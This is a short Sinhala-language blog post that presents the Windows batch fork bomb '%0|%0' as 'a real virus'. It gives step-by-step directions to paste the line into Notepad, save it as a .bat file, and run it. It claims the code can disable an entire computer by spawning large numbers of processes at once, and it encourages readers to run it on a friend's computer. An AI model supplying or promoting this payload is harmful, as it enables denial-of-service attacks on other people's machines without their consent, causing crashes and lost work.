නියම වෛරස් එකක්......


මේකේ තියෙන්නේ පොඩි කෝඩ් එකක්.එත් code ඒක පොඩි උනාට මේකට පුළුවන් මුළු computer එකම අඩපන කරලා දාන්න.....
කතා කර කර ඉන්නැතුව අපි කෙලින්ම වැඩේට බහිමු.මෙන්න මේකයි code ඒක....

%0|%0

මේක notepad එකට copy කරලා පේස්ට් කරගන්න...ඊට පස්සේ කැමති නමක් දීල එකේ extension ඒක .bat 
කියල type කරගෙන save කරගන්න.දැන් වැඩේ හරි.(test.bat)

මේකෙන් වෙන්නෙ එකපාර විශාල progress ගණනාවක් එකපාර වෙන ඒක..
යාළුවගේ computer එකට දාල run කරලා බලන්නකෝ...............


Share on Google Plus

About Unknown

    Blogger Comment
    Facebook Comment

0 comments:

Post a Comment